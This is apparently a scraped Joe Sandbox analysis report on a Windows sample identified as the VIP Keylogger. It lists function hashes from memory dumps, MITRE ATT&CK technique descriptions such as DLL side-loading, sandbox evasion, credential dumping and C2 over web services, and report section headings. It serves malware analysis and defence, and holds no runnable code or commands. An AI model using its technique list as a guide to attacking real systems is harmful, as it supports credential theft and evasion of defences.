Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef51dcd17a30b4e37faba939ee2bdf63a86b5b8c95b6aa96cde5cf6a90317d13
Instruction ID: 5f009545155eaa36acf38dd4409975e464486e5d006b31947378ec06d2713bee
Opcode Fuzzy Hash: ef51dcd17a30b4e37faba939ee2bdf63a86b5b8c95b6aa96cde5cf6a90317d13
Instruction Fuzzy Hash: A1A11471D116598EDB10DFA9C844ADDFBB5FF89300F10D2AAE409BB261EB709A85CF50

Function 00D33AA1 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d30b23d08f261403ffa058b62a4a212244e0c301e2de826905c2c390c9f063
Instruction ID: 048335edff171a66909b068250696406d2140f69afe9861b8d8da7ab1e7c5428
Opcode Fuzzy Hash: a2d30b23d08f261403ffa058b62a4a212244e0c301e2de826905c2c390c9f063
Instruction Fuzzy Hash: C451C96668E7D08FDF934AB888F81873F61DA5351078F5CEBC5C247CA6D51C480ADB62

Function 00D3F138 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f909e3cec1740e417b79b8aa70ebe1ce89d520d161f39ff389d79297dfe7e16
Instruction ID: cf614eabb6e010170532456e8f04d7126cd25374461e4e69fa28bb7a887a316f
Opcode Fuzzy Hash: 0f909e3cec1740e417b79b8aa70ebe1ce89d520d161f39ff389d79297dfe7e16
Instruction Fuzzy Hash: BD511878E02208DBDB04EFA9D48479EFBB2FF49310F14D129E404AB295DB759985CF64

Function 00D3F324 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d5a5e8173925c7bf17145b4ac9d2fa27ceb37aa877cc9f34d0020425f7a9292
Instruction ID: d309611ddf73485433c8074f58bc90cac1cef45ebad0c546c63a573aaa39c2b4
Opcode Fuzzy Hash: 5d5a5e8173925c7bf17145b4ac9d2fa27ceb37aa877cc9f34d0020425f7a9292
Instruction Fuzzy Hash: 10510478E01208DFCB10EFA8D484BEEBBB2FF48310F249129E405AB295D7759981CF64

Function 06698D11 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ae44ac1fe67637dd6b093086b349c0084ea9e6567dc88f6c8c58f9069f365e
Instruction ID: 87bb0441e41f1c2ad3c7bb68c0d84979fd60c4d99ef63feab716e1da4f47fc44
Opcode Fuzzy Hash: 78ae44ac1fe67637dd6b093086b349c0084ea9e6567dc88f6c8c58f9069f365e
Instruction Fuzzy Hash: 6141F7B1D016589BEB18CFAAD8883DEFBF6BF88314F14C52AE418AB294DB740545CF50

Function 0669F528 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05809813fc3cbdbd8f5b5d277b21b4ec41410433dd907df1016a39f85719ece5
Instruction ID: 422976b0d7be821702e7c429b58f196807df5f3bb4705293037d57b99a9f8289
Opcode Fuzzy Hash: 05809813fc3cbdbd8f5b5d277b21b4ec41410433dd907df1016a39f85719ece5
Instruction Fuzzy Hash: 04411374E012089BEF58DFAAD8506DEBBF6AF89300F20D12AD818BB254DB345942CF54

Function 0669D6C0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43efe0ee804ecb157f5721399fbd22eecc99c18c8a2aa7e55f540f6962a7aea
Instruction ID: 97ab9d22dcfea8a8defdf660c2582bc45bfa15a561eac63f0cd27527fe1d9810
Opcode Fuzzy Hash: b43efe0ee804ecb157f5721399fbd22eecc99c18c8a2aa7e55f540f6962a7aea
Instruction Fuzzy Hash: EE41E470D016089BEF58DFAAD8446DDBBF6AF89300F20D13AD418BB254DB345946CF54

Function 0669EC78 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6635aaa562fa1fc2245b576df64568cdf8bfe049ce2354034c037779b015dd5d
Instruction ID: f5080e1cb246aa42d8ef90d8f87d0d2ae7daa9054843f8bc3f202d9269761c66
Opcode Fuzzy Hash: 6635aaa562fa1fc2245b576df64568cdf8bfe049ce2354034c037779b015dd5d
Instruction Fuzzy Hash: 4A41F270E012088BEF58DFAAD9546DEBBF6AF89300F20D129D418BB354EB355946CF54

Function 0669F0D1 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b60d965de3413583abd262c29cd9e7cfd479065fdd40efeff97be72b7200c963
Instruction ID: 99cee0aaf290ca7489b3d4e02dc384543235cc475b9c9398106fdabdab82a88f
Opcode Fuzzy Hash: b60d965de3413583abd262c29cd9e7cfd479065fdd40efeff97be72b7200c963
Instruction Fuzzy Hash: 3A411270E012088FEF58DFAAD9506DEBBF6AF89300F24C12AD418BB264DB345946CF54

Function 0669CE0F Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7305654aff3ff1eed11cc6b7543ab242e5072135095feb24b74a7670d4905806
Instruction ID: be89809e562328db97c0042df130c7f6af336ce3afff265cd1cb6f0d315f245f
Opcode Fuzzy Hash: 7305654aff3ff1eed11cc6b7543ab242e5072135095feb24b74a7670d4905806
Instruction Fuzzy Hash: 86410274D012488FEF58DFAAD8446DEBBF2AF89300F20C12AD819BB254EB345946CF50

Function 0669DB19 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee85e872e3a007502dfbad857ee8337e614196d15af9b9da75432e2faa8b1719
Instruction ID: 901309ec4858a4113af3370f1d4d82e35db3580986866fe81d27b0e4966915be
Opcode Fuzzy Hash: ee85e872e3a007502dfbad857ee8337e614196d15af9b9da75432e2faa8b1719
Instruction Fuzzy Hash: 10410270E016488FEF58CFAAD8546DEBBF6AF89300F24D129D418BB254DB345942CF54

Function 0669E3CA Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 046b1270a83dd6f6b102bcb2df86357fae0fb9bb800803971b32609a965884e9
Instruction ID: 0c81045ff4089cf04ad9444c5a1632ccfa1da991a44fa8d04495827e94d698f7
Opcode Fuzzy Hash: 046b1270a83dd6f6b102bcb2df86357fae0fb9bb800803971b32609a965884e9
Instruction Fuzzy Hash: BE410274E012488FEF58DFAAD9446DEBBF6AF89300F20C12AD818BB254DB355946CF50

Function 0669F982 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f3e3570a52ab7926559ffecb12cadbb7e0f89341e41b7e5fa63ed1fae58acf
Instruction ID: 638514ab45f375dd6cb99993307668367dcf20202dea44060ee71180f6092dec
Opcode Fuzzy Hash: c3f3e3570a52ab7926559ffecb12cadbb7e0f89341e41b7e5fa63ed1fae58acf
Instruction Fuzzy Hash: 2641E275E012089BEF58DFAAD8506DDBBF6AF89300F20D129D818BB254DB345946CF54

Function 0669DF7F Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45354fad79c0a14901569850a98b2b64d9f9af31890bf374f11ae7c566c3b20
Instruction ID: b72bc42b48e71059f96a29c7213da6fd8a155b6131af4567a58eb51613425a85
Opcode Fuzzy Hash: e45354fad79c0a14901569850a98b2b64d9f9af31890bf374f11ae7c566c3b20
Instruction Fuzzy Hash: DD41E270E01208CBEF58DFAAD8406DEBBF6AF89300F20D12AD418BB264DB355946CF50

Function 0669E82F Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f8c72c20ab2e6bc10e3314deddac16f0dac8050525a83274a7dfc5b32510d4
Instruction ID: 1397a9583876ba96443d7274e6342dda1aa49e4c2d307131412c3db2342452fe
Opcode Fuzzy Hash: f4f8c72c20ab2e6bc10e3314deddac16f0dac8050525a83274a7dfc5b32510d4
Instruction Fuzzy Hash: FD41D070E01208CFEF58DFAAD94069EBBF6AF89300F24D12AD419AB254EB355946CF54

Function 00D339ED Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d0ebc27ba346d42ea489b3c87f3cf1191b99ba468bba1ad95d52b448a626f8
Instruction ID: 1e0f799336f0bf53785ea9b0ae2a51295dca0aea348d5753eeb404d01ed5b7b1
Opcode Fuzzy Hash: 04d0ebc27ba346d42ea489b3c87f3cf1191b99ba468bba1ad95d52b448a626f8
Instruction Fuzzy Hash: 1311A7556CE7D08FDF96467884E81C77FB14A4741038F6CAF8986468A7845D580ECF26

Function 00D36920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 00D3695E
\;^q, xrefs: 00D36936
\;^q, xrefs: 00D36952
\;^q, xrefs: 00D3692C

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 71ed146c469a995c6b75eb522832824919c2e36cca6a479ee0c271b3d2f379ff
Instruction ID: 4492033229f9b599d884304f61e682b5c7e8e9b6289eacef421c570128a80abe
Opcode Fuzzy Hash: 71ed146c469a995c6b75eb522832824919c2e36cca6a479ee0c271b3d2f379ff
Instruction Fuzzy Hash: B201DF31B40104AFCB64CE2CC544B2537EBAF88B60B29C46AE586CF3B4DA31DC418B70

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report z64BLPL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
z64BLPL.exe

Function 00D3C146 Relevance: 6.5, Strings: 5, Instructions: 224
COMMON

Function 00D35362 Relevance: 6.4, Strings: 5, Instructions: 195
COMMON

Function 00D3CD28 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Function 00D3CFF7 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Function 00D3C468 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Function 00D3D599 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Function 00D3D2CB Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

Function 00D3C738 Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

Function 00D329EC Relevance: 5.5, Strings: 4, Instructions: 490
COMMON

Function 00D37118 Relevance: 5.3, Strings: 4, Instructions: 339
COMMON

Function 00D376F1 Relevance: 10.5, Strings: 8, Instructions: 470
COMMON